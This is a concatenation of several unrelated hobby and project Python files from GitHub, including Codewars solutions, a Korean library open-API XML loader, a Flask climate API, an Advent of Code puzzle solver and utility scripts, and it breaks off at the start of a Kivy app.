MORSE_CODE['.-'] = 'A'\n    # MORSE_CODE['--...'] = '7'\n    # MORSE_CODE['...-..-'] = '$'\n\n    MORSE_CODE_DICT = {'A': '.-', 'B': '-...',\n                       'C': '-.-.', 'D': '-..', 'E': '.',\n                       'F': '..-.', 'G': '--.', 'H': '....',\n                       'I': '..', 'J': '.---', 'K': '-.-',\n                       'L': '.-..', 'M': '--', 'N': '-.',\n                       'O': '---', 'P': '.--.', 'Q': '--.-',\n                       'R': '.-.', 'S': '...', 'T': '-',\n                       'U': '..-', 'V': '...-', 'W': '.--',\n                       'X': '-..-', 'Y': '-.--', 'Z': '--..',\n                       '1': '.----', '2': '..---', '3': '...--',\n                       '4': '....-', '5': '.....', '6': '-....',\n                       '7': '--...', '8': '---..', '9': '----.',\n                       '0': '-----', ',': '--..--', '.': '.-.-.-',\n                       '?': '..--..', '/': '-..-.', '-': '-....-',\n                       '(': '-.--.', ')': '-.--.-', '$': '...-..-',\n                       '&': '.-...', ':': '---...',\n                       'SOS': '...---...', '!': '-.-.--', '+': '.-.-.',\n                       '\"': '.-..-.', '_': '..--.-', '\\'': '.----.',\n                       ';': '-.-.-.', '=': '-...-', '@': '.--.-.', '¿': '..-.-',\n                       '¡': '--...-'\n                       }\n\n    Reverse_MORSE_CODE_DICT = {value: key for key, value in MORSE_CODE_DICT.items()}\n\n    morse_code = morse_code.strip()\n    words_list = [word.split(\" \") for word in morse_code.split(\"   \")]\n\n    words_list = [[Reverse_MORSE_CODE_DICT[sym] for sym in word] for word in words_list]\n    res = ''\n    for word in words_list:\n        res += \"\".join(word) + \" \"\n\n    # return ' '.join(''.join(MORSE_CODE[letter] for letter in word.split(' ')) for word in morseCode.strip().split('   '))\n    return res.strip()\n\n\ndef swap_el(pointer):\n    if pointer.next is not None:\n        if pointer.data > pointer.next.data:\n            temp = pointer.next.data\n            pointer.next.data = pointer.data\n            pointer.data = temp\n        if pointer.next.next is not None:\n            swap_el(pointer.next)\n\n\n
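# swap_el above assumes a singly linked list whose nodes expose 'data' and 'next',\n# but no node class exists in this scratch file. A minimal sketch (the names below are\n# made up): one swap_el call is a single bubble-sort pass from the head, so calling it\n# once per element sorts the whole list.\nclass _Node:\n    def __init__(self, data, nxt=None):\n        self.data = data\n        self.next = nxt\n\n\ndef _bubble_sort_linked_list(head, length):\n    # each pass bubbles one more element toward its final place\n    for _ in range(length):\n        swap_el(head)\n    return head\n\n\nclass WordDictionary:\n    def __init__(self):\n        self.dict_words = {}\n\n    def add_word(self, word):\n        self.dict_words[word.lower()] = word\n\n    def __deep_search(self, word):\n        template = re.compile(word)\n        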
for stored_word in self.dict_words.values():\n            if re.fullmatch(template, stored_word):\n                return True\n        return False\n\n    def search(self, word):\n        return True if self.dict_words.get(word.lower()) else self.__deep_search(word.lower())\n\n\ndef user_contacts(data):\n    contacts = {}\n    for item in data:\n        contacts.setdefault(item[0], item[1]) if len(item) > 1 else contacts.setdefault(item[0], None)\n\n    return contacts\n\n\ndef user_contacts_best(data):\n    return {contact[0]: contact[1] if len(contact) > 1 else None\n            for contact in data}\n\n\nfrom itertools import zip_longest\n\n\ndef user_contacts_zip(data):\n    print(*data)\n    print(data)\n    return dict(zip(*zip_longest(*data)))\n\n\ndef transpose_list(list_of_lists):\n    print('list', list_of_lists)\n    print('*list', *list_of_lists)\n    print('zip*list', list(zip(*list_of_lists)))\n    return [\n        list(row)\n        for row in zip(*list_of_lists)\n    ]\n\n\n# >>> date_info = {'year': \"2020\", 'month': \"01\", 'day': \"01\"}\n# >>> track_info = {'artist': \"Beethoven\", 'title': 'Symphony No 5'}\n# >>> filename = \"{year}-{month}-{day}-{artist}-{title}.txt\".format(\n# ...     **date_info,\n# ...     **track_info,\n# ... )\n# >>> filename\n# '2020-01-01-Beethoven-Symphony No 5.txt'\n\ndef get_multiple(*keys, dictionary, default=None):\n    return [\n        dictionary.get(key, default)\n        for key in keys\n    ]\n\n\ndef test(kwargs_dict):\n    # NOTE: ** unpacking into print() only works when the keys are valid print\n    # keyword arguments such as 'sep' or 'end'\n    print(**kwargs_dict)\n\n\n# create_phone_number([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]) # => returns \"(123) 456-7890\"\ndef create_phone_number(n):\n    return '({0}{1}{2}) {3}{4}{5}-{6}{7}{8}{9}'.format(*n)\n\n\n# There are two lists, possibly of different lengths.\n# The first one consists of keys, the second one consists of values.\n# Write a function createDict(keys, values) that returns a dictionary created from keys and values.\n# If there are not enough values, the rest of keys should have a None (JS null) value.\n# If there not enough keys, just ignore the rest of values.\n\ndef createDict(keys, values):\n    result_dict = dict(zip_longest(keys, values))\n    # surplus values all collapse onto the key None; drop that key if it appeared\n    if None in result_dict:\n        del result_dict[None]\n    return result_dict\n\ndef createDict_alt(keys, values):\n    return dict(zip(keys, values + [None]*(len(keys) - len(values))))\n#########################\n\n# Python dictionaries are inherently unsorted.\n# So what do you do if you need to sort the contents of a dictionary?\n# Create a function that returns a sorted list of (key, value) tuples\n# (Javascript: arrays of 2 items).\n# The list must be sorted by the value and be sorted largest to smallest.\ndef sort_dict(d):\n    return sorted(d.items(),key=lambda x:x[1],reverse=True)\n\n# In this kata, you will take the keys and values of a dict and swap them around.\n# You will be given a dictionary, and then you will want to return a dictionary with the old values as the keys, and list the old keys as values under their original keys.\n# For example, given the dictionary: {'Ice': 'Cream', 'Age': '21', 'Light': 'Cream', 'Double': 'Cream'},\n# you should return: {'Cream': ['Ice', 'Double', 'Light'], '21': ['Age']}\n\ndef switch_dict(dic):\n    res = {}\n    for key, value in dic.items():\n        res.setdefault(value, []).append(key)\n    return res\n\n\ndef chain(init_val, functions):\n    print(init_val, functions)\n    if len(functions) == 0:\n        print('init_val=', init_val)\n        return init_val\n    else:\n        return chain(functions[0](init_val), functions[1:])\n\ndef add10(x): return x + 10\ndef mul30(x): return x * 30\n\n
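# A quick trace of chain(): each call applies the first function and recurses on the\n# rest, so the function list is applied left to right:\n#   chain(50, [add10, mul30]) -> chain(add10(50)=60, [mul30]) -> chain(mul30(60)=1800, []) -> 1800\n\n# Write a function that when given a URL as a string, parses out just the domain name and returns it as a string.\n# For example:\n# * url = 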
\"http://github.com/carbonfive/raygun\" -> domain name = \"github\"\n# * url = \"http://www.zombie-bites.com\" -> domain name = \"zombie-bites\"\n# * url = \"https://www.cnet.com\" -> domain name = cnet\"\n\n\n\n\n\n\ndef domain_name(url):\n\n #match=re.search('\\w+://(\\S+?)\\.|www\\.(\\S+?)\\.',url)\n match = re.search('(?:http://|https://){0,1}(?:www\\.{0,1}){0,1}(\\S+?)\\.{1}', url )\n\n return (match[1]) if match[1] else ( match[2] if match[2] else None)\n\ndef solution(roman):\n roman_dict={'I':1,\n 'V':5,\n 'X':10,\n 'L':50,\n 'C':100,\n 'D':500,\n 'M':1000\n }\n roman_list= np.array([roman_dict[symb] for symb in roman])\n roman_list_shift=np.append(roman_list[1:],0)\n is_bigger=roman_list>=roman_list_shift\n is_smaller=roman_list<roman_list_shift\n return roman_list[is_bigger].sum()-roman_list[is_smaller].sum()\n\n# https://www.codewars.com/kata/54521e9ec8e60bc4de000d6c/train/python\ndef max_sequence_non_opt(arr):\n arr=np.array(arr)\n max_sub_list=np.array([])\n max_sum=0\n for f in range(len(arr)+1):\n for i in range(f,len(arr)+1):\n sub_list=arr[f:i]\n\n cur_sum=np.sum(sub_list)\n if cur_sum>max_sum:\n max_sum=cur_sum\n max_sub_list=sub_list\n\n\n return max_sub_list, max_sum\n\ndef max_sequence_opt(arr):\n # алгоритм Алгоритм Кадане (динамическое программирование)\n arr=np.array(arr)\n zero=np.array([0]*len(arr))\n flag=np.sum(arr>zero)\n print(arr)\n if len(arr) > 1 and flag:\n local_sum = 0\n global_sum = 0\n for i in arr:\n local_sum = max(i, local_sum + i)\n global_sum = max(global_sum, local_sum)\n else:\n global_sum = 0\n return global_sum\n\ndef max_sequence_opt_refact(arr):\n #https: // math4everyone.info / blog / 2020 / 12 / 29 / poisk - maksimalnoj - summy - posledovatelnyh - elementov - massiva - algoritm - kadane - dinamicheskoe - programmirovanie /\n\n local_sum = 0\n global_sum = 0\n for i in arr:\n local_sum = max(i, local_sum + i)\n global_sum = max(global_sum, local_sum)\n\n return global_sum\n\ndef max_sequence(arr):\n print(arr)\n arr = np.array(arr)\n max_sub_list = np.array([])\n if len(arr):\n max_sum = np.array(arr).sum()\n else:\n return 0\n print('max_sum', max_sum)\n\n min_index=np.argmin(arr)\n print('min index=',min_index, 'min val', arr[min_index])\n if np.array(arr[:min_index]).sum() > max_sum or np.array(arr[min_index+1:]).sum() > max_sum:\n print('left max',arr[:min_index].sum())\n print('right max',arr[min_index+1:].sum() )\n left_sum=arr[:min_index].sum()\n right_sum=arr[min_index+1:].sum()\n\n if left_sum > max_sum and left_sum < arr[min_index] and left_sum>right_sum:\n return max_sequence(arr[:min_index])\n else:\n if right_sum > max_sum and right_sum.sum()< arr[min_index] and left_sum<right_sum:\n return max_sequence(arr[min_index+1:])\n else:\n return max_sequence_non_opt(arr)\n\n\n else:\n return max_sequence_non_opt(arr)\n\n\n\n#https://www.codewars.com/kata/5526fc09a1bbd946250002dc/train/python\n\ndef my_print(func):\n def wrappedFunc(arg):\n res=func(arg)\n print('res=',res)\n return res\n return wrappedFunc\n\n@my_print\ndef find_outlier(integers):\n integers = np.array(integers)\n odds = np.array([2] * len(integers))\n check=integers%odds\n return int(integers[check==1]) if check.sum() == 1 else int(integers[check==0])\n\n\n\n@my_print\ndef foo():\n pass\n\n# прохід матриці по равлику поворот матриці\n\ndef snail(arr):\n\n if type(arr)!=type(np.array([])):\n arr=np.array(arr)\n\n def __snail_out(arr):\n res=[]\n if len(arr[0])>1:\n\n res=res+list(arr[0,0:-1])+list(arr[:,-1])\n arr=arr[1:, 0:-1]\n arr=np.array(list(zip(*arr))[::-1])\n 
arr = np.array(list(zip(*arr))[::-1])\n return res+__snail_out(arr)\n\n else:\n\n res.append(arr[0,0])\n return res\n\n if np.shape(arr) == np.shape([[]]):\n return []\n else:\n return __snail_out(arr)\n\ndef snail(array):\n m = []\n array = np.array(array)\n while len(array) > 0:\n m += array[0].tolist()\n array = np.rot90(array[1:])\n return m\n\nif __name__ == '__main__':\n # data = [[\"Grae Drake\", 98110], [\"Bethany Kok\"], [\"Alex Nussbacher\", 94101], [\"Darrell Silver\", 11201]]\n # print(user_contacts_zip(data))\n # print(transpose_list([[1, 4, 7], [2, 5, 8], [3, 6, 9]]))\n #\n # fruits = {'lemon': [1,2,3], 'orange': 'orange', 'tomato': 'red'}\n # fruits_1 = {'lemon': [1, 4], 'orange': [2], 'tomato': 'red'}\n # #get_multiple('lemon', 'tomato', 'squash', dictionary=fruits, default='unknown')\n # #test(fruits)\n #\n # print('dict=', data)\n # print('*dict=', *data)\n #\n # print('dict=', list(zip_longest(*data)))\n # print('dict=', dict(zip(*zip_longest(*data))))\n # num=[1, 2, 3, 4, 5, 6, 7, 8, 9, 0] # => returns \"(123) 456-7890\"\n # print(create_phone_number(num))\n # dict_in={'Ice': 'Cream', 'Age': '21', 'Light': 'Cream', 'Double': 'Cream'}\n # print(switch_dict(dict_in))\n # print(dict_in)\n\n #print(chain(50, [mul30]))\n\n # url = \"www.xakep.ru\"\n # print(domain_name(url))\n # url = \"https://google.com\"\n # print(domain_name(url))\n #\n # url = \"http: // google.co.jp\"\n # print(domain_name(url))\n # print(solution('XXI'))\n #arr=[160, 3, 1719, 19, 11, 13, -21]\n #find_outlier(arr)\n arr = [[1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12],\n [13, 14, 15, 16]]\n print(snail([[]]))\n\n\n\n\n","repo_name":"dav-pr/codewars","sub_path":"codewars.py","file_name":"codewars.py","file_ext":"py","file_size_in_byte":12229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33575634008","text":"import urllib.request\nimport urllib\nfrom xml.dom.minidom import parse, parseString\n'''save_data_list = [\"SIGUN_NM\", \"LIBRRY_NM\", \"CLOSE_DE_INFO\", \"OPERT_BEGIN_TM\", \"OPERT_END_TM\",\n \"LIBRRY_TELNO\", \"REFINE_ROADNM_ADDR\", \"REFINE_WGS84_LOGT\", \"REFINE_WGS84_LAT\",\n \"TMP01\", \"TMP02\", \"TMP03\", \"TEMP\", \"BOOK_DATA_CNT\"]\nrename_data_list = [\"SIGUN_NM\", \"LIBRRY_NM\", \"CLOSE_DE_INFO\", \"BEGIN_TM\", \"END_TM\",\n \"LIBRRY_TELNO\", \"ADDRESS\", \"LONGI\", \"LAT\",\n \"SAT_BEGIN_TM\", \"SAT_END_TM\", \"HOLI_BEGIN_TM\", \"HOLI_END_TM\", \"BOOK_NUM\"]'''\n\nsave_data_dict = {'SIGUN_NM': 'SIGUN_NM', 'LIBRRY_NM': 'LIBRRY_NM',\n 'CLOSE_DE_INFO': 'CLOSE_DE_INFO', 'OPERT_BEGIN_TM': 'BEGIN_TM',\n 'OPERT_END_TM': 'END_TM', 'LIBRRY_TELNO': 'LIBRRY_TELNO',\n 'REFINE_ROADNM_ADDR': 'ROAD_ADDRESS', 'REFINE_WGS84_LOGT': 'LONGI',\n 'REFINE_WGS84_LAT': 'LAT', 'TMP01': 'SAT_BEGIN_TM', 'TMP02': 'SAT_END_TM',\n 'TMP03': 'HOLI_BEGIN_TM', 'TEMP': 'HOLI_END_TM', 'BOOK_DATA_CNT': 'BOOK_NUM', \"REFINE_LOTNO_ADDR\" : \"ADDRESS\"}\n\n\nlibrary_list = []\nlocal_library_list = []\n\ndef search_name_and_register(name):\n global library_list\n library_list = search_name(name)\n return\n\n\ndef search_name(name, lib_list=None):\n if lib_list is None:\n lib_list = local_library_list\n result = []\n for lib in lib_list:\n if lib[\"LIBRRY_NM\"].find(name) != -1:\n result.append(lib)\n elif lib[\"ADDRESS\"].find(name) != -1:\n result.append(lib)\n elif lib[\"ROAD_ADDRESS\"].find(name) != -1:\n result.append(lib)\n return result\n\n\ndef search_and_register(to_search):\n global library_list, local_library_list\n local_library_list = library_list = 
search(to_search)\n\ndef search(to_search):\n    # search: query the Gyeonggi-do open API for libraries in the given region\n    sigun = urllib.parse.quote(to_search)\n    key = '961adfdf5c574548bf2e9352dde74c19'\n    url = \"https://openapi.gg.go.kr/Library?\" + \"KEY=\" + key + \"&SIGUN_NM=\" + sigun\n    req = urllib.request.Request(url)\n    resp = urllib.request.urlopen(req)\n    docs = parseString(resp.read().decode('utf-8'))\n\n    # save: collect each <row> element into a dict keyed by the renamed fields\n    lib_list = []\n    library = docs.childNodes[0].childNodes\n    # head = library[1].childNodes\n    # num_of_library = head[1].childNodes[0].nodeValue\n    for row in library:\n        if row.nodeName == \"row\":\n            library_data = {}\n            for comp in row.childNodes:\n                if comp.nodeName in save_data_dict.keys():\n                    library_data[save_data_dict[comp.nodeName]] = comp.childNodes[0].nodeValue\n            lib_list.append(library_data)\n    return lib_list\n\n\n\n\n\n\n\n\n","repo_name":"kimrugi/2021-script-term_project","sub_path":"load_xml.py","file_name":"load_xml.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38062147748","text":"from pathlib import Path\n\nMAX_CHUNK_SIZE = 4096\nPROJECT_DIR = Path(__file__).parent.resolve()\n\n\ndef create_project_dir(name):\n    project_dir = Path(name).resolve()\n    if project_dir.exists():\n        print(f\"Path {project_dir} already exists.\")\n        project_dir = None\n    else:\n        project_dir.mkdir()\n\n    return project_dir\n\n\ndef copy_targets(copy_list):\n    for src, dst in copy_list:\n        copy_target(src, dst)\n\n\ndef copy_target(src, dst):\n    if dst.exists() and not is_content_equal(src, dst):\n        print(\n            f\"File {dst} already exists and is different from the template. \"\n            \"Overwrite (o), merge (m) or skip (s)?\"\n        )\n        while True:\n            value = input(\"(o/m/s) [o]: \")\n            if value == \"o\" or value == \"\":\n                dst.unlink()\n                copy_file(src, dst)\n            elif value == \"m\":\n                merge_file(src, dst)\n            elif value == \"s\":\n                print(f\"Skipping {dst}\")\n            else:\n                continue\n            break\n    else:\n        copy_file(src, dst)\n\n\ndef copy_file(f_src, f_dst):\n    if not f_dst.parent.exists():\n        f_dst.parent.mkdir(parents=True)\n    with open(f_src, \"rb\") as src, open(f_dst, \"wb\") as dst:\n        dst.write(src.read())\n\n\ndef merge_file(f_src, f_dst):\n    with open(f_src, \"r\") as src, open(f_dst, \"r+\") as dst:\n        src_lines = src.readlines()\n        dst_lines = dst.readlines()\n        dst_lines += [\n            line\n            for line in src_lines\n            if line not in dst_lines and line.strip() != \"\"\n        ]\n        dst.seek(0)\n        dst.writelines(dst_lines)\n\n\n
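# A tiny sketch (added; the paths are hypothetical) of merge_file's union semantics:\n# the destination keeps all of its own lines and appends only the non-blank template\n# lines it is missing -- nothing is removed or reordered.\ndef _merge_file_demo(tmp_dir):\n    src = tmp_dir / \"template.txt\"\n    dst = tmp_dir / \"project.txt\"\n    src.write_text(\"a\\nb\\n\")\n    dst.write_text(\"b\\nc\\n\")\n    merge_file(src, dst)\n    assert dst.read_text() == \"b\\nc\\na\\n\"\n\n\ndef write_file(f_dst, text):\n    if f_dst.exists():\n        value = input(\n            f\"File {f_dst} already exists. Overwrite (o) or skip (s)? 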
[o]: \"\n )\n if value != \"o\" and value != \"\":\n return\n f_dst.parent.mkdir(parents=True, exist_ok=True)\n with open(f_dst, \"w\") as dst:\n dst.write(text)\n\n\ndef is_content_equal(f1, f2):\n with open(f1, \"rb\") as f1, open(f2, \"rb\") as f2:\n while True:\n chunk1 = f1.read(MAX_CHUNK_SIZE)\n chunk2 = f2.read(MAX_CHUNK_SIZE)\n if chunk1 != chunk2:\n return False\n if not chunk1:\n break\n return True\n","repo_name":"hughplay/dockerlab","sub_path":"dockerlab/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"2320394817","text":"import matplotlib.pyplot as pt\n\nfrom pulse_lib.tests.hw_schedule_mock import HardwareScheduleMock\nimport pulse_lib.segments.utility.looping as lp\n\nfrom configuration.small import init_hardware, init_pulselib\nfrom utils.plot import plot_awgs\n\n\n# create \"AWG1\"\nawgs, digs = init_hardware()\n\n# create channels P1, P2\np = init_pulselib(awgs, digs)\n\nt_measure_loop = lp.linspace(100,800,8,name=\"t_measure\",unit=\"ns\",axis=0)\nv_param = lp.linspace(20,240,12,name=\"vP1\",unit=\"mV\",axis=1)\nt_wait = 100\n\n\nseg1 = p.mk_segment()\nseg2 = p.mk_segment()\n\nseg1.P1.add_ramp_ss(0, 100, 0, v_param)\nseg1.P1.add_block(100, 200, v_param)\n\nseg2.P2.add_block(0, 100, 200)\nseg2.P2.wait(t_wait)\nseg2.reset_time()\nseg2.SD1.acquire(50, t_measure=t_measure_loop)\nseg2.SD2.acquire(50, t_measure=t_measure_loop) # @@@ test multiple channels with Keysight\nseg2.wait(t_measure_loop)\n#seg2.add_HVI_marker('dig_trigger_1', t_off=50)\nseg2.P1.add_block(0, 100, v_param)\n#seg2.add_HVI_variable('t_measure', t_measure_loop)\n\n# create sequence\nseq = p.mk_sequence([seg2])\nseq.set_hw_schedule(HardwareScheduleMock())\nseq.n_rep = 3\n\nprint('Shape', seq.shape)\nprint(seq.setpoints)\nprint(seq.labels)\n\n\nfor index in ([(0,0), (11,1)]):\n seq.upload(index=index)\n seq.play(index=index)\n\npt.figure()\npt.title('segment 1')\nseg1.plot((0,5))\n\nfor index in [(0,0), (0,2), (8,0)]:\n pt.figure()\n pt.title(f'segment 2 - {index}')\n seg2.plot(index=index)\n\n\nplot_awgs(awgs)\npt.title('AWG upload with DC compensation pulse at end')\n","repo_name":"stephanlphilips/pulse_lib","sub_path":"pulse_lib/examples/example_t_measure_sweep.py","file_name":"example_t_measure_sweep.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38533268970","text":"from django.contrib import admin\nfrom django.urls import path\nfrom app import views\n\nurlpatterns = [\n path(\"\",views.home, name='homepage'),\n path('menu/<int:pk>',views.menu,name='menu'),\n path('signup/',views.Signup.as_view(),name='signup'),\n path('login/',views.Login.as_view(),name='login'),\n path('logout/',views.logout),\n path('cart/<int:pk>',views.Cart.as_view()),\n \n\n]","repo_name":"abhishek740/FoodOrderAppInDjango","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38164887076","text":"import logging\r\nimport os\r\n\r\nimport hashlib\r\n\r\nfrom collections import deque\r\nfrom grid_system import XY\r\n\r\nscript_dir = os.path.dirname(__file__)\r\nscript_name = os.path.splitext(os.path.basename(__file__))[0]\r\n\r\nlog_file = os.path.join(script_dir, f\"logs/{script_name}.log\")\r\nlogging.basicConfig(level=logging.WARNING, 
filename=log_file, filemode='w',)\r\n\r\npasscode = \"rrrbmfta\"\r\n\r\ndirections = {\r\n \"U\" : XY(0, -1),\r\n \"D\" : XY(0, +1),\r\n \"L\" : XY(-1, 0),\r\n \"R\" : XY(+1, 0),\r\n}\r\n\r\ndef connected_nodes(node, path_to_here):\r\n connected_nodes = {}\r\n hash_value = hashlib.md5(f\"{passcode}{path_to_here}\".encode()).hexdigest()\r\n for i, d in enumerate(\"UDLR\"):\r\n if hash_value[i] in \"bcdef\":\r\n n = node + directions[d]\r\n if n.x in range(4) and n.y in range(4):\r\n connected_nodes[d] = n\r\n return connected_nodes\r\n\r\ndef bfs_path(start=XY(0, 0), goal=XY(3, 3), find_shortest=True):\r\n path_to_goal = None\r\n # Still need to visit (point, via path)\r\n to_visit = deque([(start, \"\")])\r\n while to_visit:\r\n this_node, path_so_far = to_visit.popleft()\r\n for d, next_node in connected_nodes(this_node, path_so_far).items():\r\n if next_node == goal:\r\n path_to_goal = path_so_far + d\r\n if find_shortest:\r\n return path_to_goal\r\n else:\r\n to_visit.append((next_node, path_so_far + d))\r\n return path_to_goal\r\n\r\nstart=XY(0, 0)\r\ngoal=XY(3, 3)\r\nprint(f\"Part 1: {bfs_path(start, goal)}\")\r\nprint(f\"Part 2: {len(bfs_path(start, goal, False))}\")","repo_name":"gid/AoC","sub_path":"Archive/2016/day_17.py","file_name":"day_17.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32193121889","text":"#!/usr/bin/python\n\n# tabprint.py -- Print a tab-delimited text file into a fixed width format for easy viewing/printing. \n# Used in conjunction with tabview.py, which provides no printing facilities or ability to\n# deal with pipes.\n\n# Example usage\n# cat foo.txt | tabprint.py | less -S\n# tabprint.py foo.txt bar.txt | less -S\n# tabprint.py foo.txt bar.txt > foobar.txt; tabview.py foobar.txt\n\nimport os, sys, re, string, tabview, fileinput #we don't currently use the tabview library, but one could imagine better integration here\nCOLUMN_WIDTH = 20\npadstr = \"\".join([\" \" for nn in range(0,COLUMN_WIDTH+1)]) #make a blank string for padding\n\n\n#0) Get the input from either stdin or all input streams\nif len(sys.argv) == 1:\n fh = sys.stdin\nelse:\n fh = fileinput.input() #See http://docs.python.org/lib/module-fileinput.html\n\n#1) Iterate over that input and write it in a fixed width format to stdout\ndef cropstring(xx):\n xlen = len(xx)\n if(xlen > COLUMN_WIDTH):\n return(xx[0:COLUMN_WIDTH]) #crop\n else:\n return(xx + padstr[0:(COLUMN_WIDTH-xlen)]) #pad\n\nfor line in fh:\n toks = line.rstrip(\"\\n\").split(\"\\t\")\n try:\n sys.stdout.write(\"\\t\".join([cropstring(xx) for xx in toks]) + \"\\n\")\n except:\n #If pipe is broken, end gracefully\n sys.exit()\n \n\n \n\n\n\n\n\n \n\n","repo_name":"dad/base","sub_path":"src/tabprint.py","file_name":"tabprint.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8395676591","text":"#!/usr/bin/env python\nimport time\n\nimport wandb\nimport yea\n\n\ndef main():\n run = wandb.init()\n history = 20\n for i in range(history):\n if i % 10 == 0:\n print(i)\n run.log(dict(num=i))\n time.sleep(0.1)\n print(\"done\")\n run.finish()\n\n\nif __name__ == \"__main__\":\n yea.setup()\n 
main()\n","repo_name":"wandb/wandb","sub_path":"tests/standalone_tests/mitm_tests/mem_pressure.py","file_name":"mem_pressure.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"26889830085","text":"# import dependencies\nimport numpy as np\nfrom datetime import datetime as dt\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n######################################################### \n# Database Setup \n#########################################################\nengine = create_engine('sqlite:///Resources/hawaii.sqlite')\n\n# reflect an existing database into a new model\nBase = automap_base()\n\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n\n#########################################################\n# Flask App Setup\n#########################################################\nclimateApp = Flask(__name__)\n\n\n#########################################################\n# Flask Routes\n#########################################################\n\n# HOME ROUTE\n@climateApp.route(\"/\")\ndef home():\n    print(\"Server received request for 'Home' page...\")\n    \n    # list available routes\n    return (\n        f\"Available routes:<br/>\"\n        f\"<br/>\"\n        f\"/api/v1.0/precipitation<br/>\"\n        f\"<br/>\"\n        f\"/api/v1.0/stations<br/>\"\n        f\"<br/>\"\n        f\"/api/v1.0/tobs<br/>\"\n        f\"<br/>\"\n        f\"/api/v1.0/startDate<br/>\"\n        f\"- User must input date formatted as yyyymmdd in place of 'startDate'<br/>\"\n        f\"<br/>\"\n        f\"/api/v1.0/startDate/endDate<br/>\"\n        f\"- User must input dates formatted as yyyymmdd in place of 'startDate' and 'endDate'\"\n    )\n\n# PRECIPITATION ROUTE\n@climateApp.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n    # create session from python to database\n    session = Session(engine)\n    \n    \"\"\"Return .json of dates and precipitation amounts\"\"\"\n    # query all dates & precipitation amounts\n    results = session.query(Measurement.date, Measurement.prcp).all()\n    \n    session.close()\n    \n    # create a dictionary from the row data and append it to a list\n    precipByDate = []\n    for date, prcp in results:\n        precipDict = {}\n        precipDict[\"Date\"] = date\n        precipDict[\"Precipitation\"] = prcp\n        precipByDate.append(precipDict)\n    \n    # return results as json\n    return jsonify(precipByDate)\n\n# STATIONS ROUTE\n@climateApp.route(\"/api/v1.0/stations\")\ndef stations():\n    # create session from python to database\n    session = Session(engine)\n    \n    \"\"\"Return .json of stations\"\"\"\n    # query all stations\n    results = session.query(Station.station).all()\n    \n    session.close()\n    \n    # convert list of tuples into normal list\n    allStations = list(np.ravel(results))\n    \n    # return results as json\n    return jsonify(allStations)\n\n# START DATE ONLY ROUTE\n@climateApp.route(\"/api/v1.0/<startDate>\")\ndef startOnly(startDate):\n    \"\"\"Fetch data on the min, max, and average temperature for all dates since startDate.\"\"\"\n\n    # parse user input into datetime object\n    parsedStart = dt.strptime(startDate, \"%Y%m%d\")\n    \n    # create session from python to database\n    session = Session(engine)\n    \n    # create list of values to select\n    sel = [func.min(Measurement.tobs),\n           func.max(Measurement.tobs),\n           func.avg(Measurement.tobs)]\n    \n
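    # run all three aggregates (min, max, avg) in a single SELECT\n    results = 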
session.query(*sel).filter(Measurement.date >= parsedStart).all()\n \n session.close()\n \n # create a dictionary from the data and append it to a list\n startDateSummary = []\n for minTemp, maxTemp, avgTemp in results:\n tempDict = {}\n tempDict[\"Minimum Temperature\"] = minTemp\n tempDict[\"Maximum Temperature\"] = maxTemp\n tempDict[\"Average Temperature\"] = avgTemp\n startDateSummary.append(tempDict)\n \n return jsonify(startDateSummary)\n\n# START TO END DATE ROUTE\n@climateApp.route(\"/api/v1.0/<startDate>/<endDate>\")\ndef startToEnd(startDate, endDate):\n \"\"\"Fetch data on the min, max, and average temperature for all dates between startDate and endDate.\"\"\"\n\n # parse user input into datetime object\n parsedStart = dt.strptime(startDate, \"%Y%m%d\")\n parsedEnd = dt.strptime(endDate, \"%Y%m%d\")\n \n # create session from python to database\n session = Session(engine)\n \n # create list of values to select\n sel = [func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n \n results = session.query(*sel).filter(Measurement.date >= parsedStart).filter(Measurement.date <= parsedEnd).all()\n \n session.close()\n \n # create a dictionary from the data and append it to a list\n startToEndSummary = []\n for minTemp, maxTemp, avgTemp in results:\n tempDict = {}\n tempDict[\"Minimum Temperature\"] = minTemp\n tempDict[\"Maximum Temperature\"] = maxTemp\n tempDict[\"Average Temperature\"] = avgTemp\n startToEndSummary.append(tempDict)\n \n return jsonify(startToEndSummary)\n \n# code to run app\nif __name__ == \"__main__\":\n climateApp.run(debug = True)","repo_name":"spennyharrison/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37174342842","text":"from kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.lang import Builder\nfrom kivy.core.clipboard import Clipboard\nimport time\n\nfrom filesharer import FileSharer\nimport webbrowser\n\nBuilder.load_file(\"frontend.kv\")\n\n\nclass CameraScreen(Screen): # This is called boilerplate code. 
